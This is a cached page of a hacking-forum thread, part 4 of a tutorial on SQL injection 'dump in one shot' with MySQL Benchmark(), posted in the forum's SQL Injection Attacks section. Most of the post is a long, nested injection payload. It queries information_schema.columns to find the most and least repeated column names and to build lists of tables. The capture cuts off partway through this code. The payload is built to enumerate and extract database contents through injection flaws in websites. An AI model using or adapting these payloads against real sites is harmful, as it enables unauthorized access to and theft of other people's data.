<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=4153506" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=4153506" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=4153506</a>. It is a snapshot of the page as it appeared on 15 Apr 2014 23:08:00 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=4153506" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:N2UxtEPJGm4J:www.hackforums.net/showthread.php%3Ftid%3D4153506&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi tutorial] dump in one shot with Benchmark() - part #4 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi tutorial] dump in one shot with Benchmark() - part #4"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=4153506"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 04-15-2014, 03:07 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi tutorial] dump in one shot with Benchmark() - part #4</span></div><br><div class="quick_keys"><div class="float_left"></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=4153506" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/rating.js"></script><div id="success_rating_4153506" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_4153506"><li style="width: 0%" class="current_rating" id="current_rating_4153506">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=4153506&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4153506&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4153506&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4153506&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=4153506&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_4153506" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_4153506_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=4153506" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=4153506&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_4153506");
// -->
</script><div><strong>[SQLi tutorial] dump in one shot with Benchmark() - part #4</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid39297951" id="pid39297951"></a><table class="tborder" style="border-top-width: 0; " id="post_39297951" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">04-05-2014, 05:38 AM <span id="edited_by_39297951"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=4153506&amp;pid=39297951#pid39297951">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a> </td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <a href="http://www.hackforums.net/online.php" title="Online"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/buddy_online.gif" alt="Online" border="0"></a><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 165<br>Posts: 2,239<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">225</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"><img src="%5BSQLi%20tutorial%5D%20dump%20in%20one%20shot%20with%20Benchmark%28%29%20-%20part%20%234%20-%20Page%201_files/sticky-bro.png" alt="Sticky Man" title="Sticky Man"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_39297951">In <a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank"><span style="text-decoration: underline;">part #1</span></a> of this tutorial I explained how to use function <span style="color: #32CD32;"><span style="font-weight: bold;">Benchmark()</span> </span>for <span style="color: #FFD700;">dump in one shot (DIOS)</span>. See in my tutorials what DIOS is - starting <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">here</span></a>.<br><br>In <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4137953" target="_blank">part #2</a></span> we were talking about <span style="color: #FFA500;">more complex</span> use of <span style="color: #FFD700;">DIOS with Benchmark()</span>.
 We saw triple DIOS (with two nested DIOS). From that tutorial we 
learned we can't use data stored in variables in one DIOS also in some 
other DIOS. They are local to each DIOS syntax. That is true for 
standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a>. <span style="color: #FFD700;">The most important thing to remember was</span> <span style="color: #32CD32;">when using benchmark based DIOS</span> <span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFA500;">we can</span></span></span> <span style="color: #FFD700;">use data stored in variables in different DIOS.</span><br><br>In <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4148766" target="_blank">part #3</a></span> I explained a way to combine standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a> with <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank">benchmark based DIOS</a></span>. That knowledge you will need to solve my challenges <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4098547" target="_blank">#95</a></span>, <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4107862" target="_blank">#96</a></span> and <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4114967" target="_blank">#97</a></span>. In <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4148766" target="_blank">part #3</a></span> I explained how to solve challenge <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4098547" target="_blank">#95</a></span> with transfer of simple local variables between different DIOS syntax.<br><br>In <span style="color: #FFA500;">part #4</span> we will solve my challenge <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4107862" target="_blank">#96</a></span>. That challenge is more complex than challenge <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4098547" target="_blank">#95</a></span>. This time we will transfer data from <span style="color: #FFD700;">few variables</span> from standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a> to <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank">benchmark based DIOS</a></span>. For later searching with <span style="color: #00BFFF;">find_in_set()</span> we will build up variables with <span style="color: #FFD700;">many data</span>. <span style="color: #FF1493;">The
 most important part of that challenge is "incremental composing" of 
data in same variable, where we add data from different iterations 
within DIOS to that variable.</span><br><br><hr><br><span style="font-size: xx-large;"><span style="font-weight: bold;"><span style="color: #FFA500;">Challenge</span> <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4107862" target="_blank">#96</a></span></span></span><br><br>Tasks in that challenge were:<ul><li>find out which column name is repeated <span style="color: #FFD700;">most frequently</span> in all tables in primary database</li> <li>display numbered list of tables where most repeated column name is contained (ordered in ascending order in <span style="color: #00BFFF;">blue</span> color)</li> <li>under each table display numbered list of its columns (aligned with table name, ordered in ascending order, in <span style="color: #32CD32;">green</span> color, most repeated column name should be marked with <span style="color: #FF0000;">red</span> color)</li> <li>find out which column name is repeated <span style="color: #32CD32;">least frequently </span>in all tables in primary database</li> <li>display numbered list of of tables where least repeated column name is contained (ordered in ascending order in <span style="color: #00BFFF;">blue</span> color)</li> <li>under each table display numbered list of its columns (aligned with table name, ordered in ascending order, in <span style="color: #32CD32;">green</span> color, least repeated column name should be marked with <span style="color: #FF0000;">red </span>color)<br></li></ul><br>To solve that challenge will use standard <a href="http://www.hackforums.net/showthread.php?tid=3487536" target="_blank"><span style="text-decoration: underline;">DIOS</span></a> for "statistics" (<span style="color: #32CD32;">seeking for most and least frequently repeated column in tables from primary database</span>) and double <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank">benchmark based DIOS</a></span> for displaying tables from primary database (with most and least frequently repeated columns) with nested <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank">benchmark based DIOS</a></span> for displaying columns from that tables. Decision for <span style="text-decoration: underline;"><a href="http://www.hackforums.net/showthread.php?tid=4134016" target="_blank">benchmark based DIOS</a></span> is clear because only there we can use data (<span style="color: #32CD32;">most and least frequently repeated column in tables from primary database</span>) stored in variables in "statistics" part of the challenge.<br><br><span style="font-size: xx-large;"><span style="font-weight: bold;"><span style="color: #FFA500;">#1</span></span></span><br><span style="font-weight: bold;"><span style="color: #FFD700;">Finding most and least frequently repeated column in tables from primary database</span></span><br><br>For that purpose we will use:<br><div class="codeblock phpcodeblock"><div class="title">PHP Code:<br></div><div class="body"><div dir="ltr"><code><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">col</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">col_n</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">col_max</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(@</span><span style="color: #66CCFF">col_max_name</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">tbl_max</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">col_min</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">10</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(@</span><span style="color: #66CCFF">col_min_name</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),(@</span><span style="color: #66CCFF">tbl_min</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;(</span><span style="color: #66CCFF">select</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">0</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">where</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">())and(</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">in</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">:=<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(&nbsp;&nbsp;@</span><span style="color: #66CCFF">x</span><span style="color: #7AC07C">,if(@</span><span style="color: #66CCFF">col</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(&nbsp;((@</span><span style="color: #66CCFF">col_n</span><span style="color: #7AC07C">:=(</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">)</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;where&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">()&nbsp;and&nbsp;</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">=@</span><span style="color: #66CCFF">col</span><span style="color: #7AC07C">))&gt;=@</span><span style="color: #66CCFF">col_max</span><span style="color: #7AC07C">),&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(&nbsp;&nbsp;if(&nbsp;(@</span><span style="color: #66CCFF">col_max_name</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">col</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(&nbsp;(@</span><span style="color: #66CCFF">col_max</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">col_n</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(&nbsp;(@</span><span style="color: #66CCFF">tbl_max</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),if(@</span><span style="color: #66CCFF">tbl_max</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(@</span><span style="color: #66CCFF">tbl_max</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">tbl_max</span><span style="color: #7AC07C">,</span><span style="color: #FF99FF">','</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">))<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(&nbsp;((@</span><span style="color: #66CCFF">col_n</span><span style="color: #7AC07C">:=(</span><span style="color: #66CCFF">select&nbsp;count</span><span style="color: #7AC07C">(</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">)&nbsp;</span><span style="color: #66CCFF">from&nbsp;information_schema</span><span style="color: #7AC07C">.</span><span style="color: #66CCFF">columns&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;where&nbsp;table_schema</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">database</span><span style="color: #7AC07C">()&nbsp;and&nbsp;</span><span style="color: #66CCFF">column_name</span><span style="color: #7AC07C">=@</span><span style="color: #66CCFF">col</span><span style="color: #7AC07C">))&lt;=@</span><span style="color: #66CCFF">col_min&nbsp;</span><span style="color: #7AC07C">and&nbsp;@</span><span style="color: #66CCFF">col_n</span><span style="color: #7AC07C">&gt;</span><span style="color: #66CCFF">1</span><span style="color: #7AC07C">),&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #66CCFF">concat<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #7AC07C">(&nbsp;if(&nbsp;(@</span><span style="color: #66CCFF">col_min_name</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">col</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),&nbsp;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(&nbsp;(@</span><span style="color: #66CCFF">col_min</span><span style="color: #7AC07C">:=@</span><span style="color: #66CCFF">col_n</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(&nbsp;(@</span><span style="color: #66CCFF">tbl_min</span><span style="color: #7AC07C">=</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),if(@</span><span style="color: #66CCFF">tbl_min</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">),<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(@</span><span style="color: #66CCFF">tbl_min</span><span style="color: #7AC07C">:=</span><span style="color: #66CCFF">concat</span><span style="color: #7AC07C">(@</span><span style="color: #66CCFF">tbl_min</span><span style="color: #7AC07C">,</span><span style="color: #FF99FF">','</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">table_name</span><span style="color: #7AC07C">),</span><span style="color: #66CCFF">0x00</span><span style="color: #7AC07C">,</span><span style="color: #66CCFF">0x00</span><span style="color: 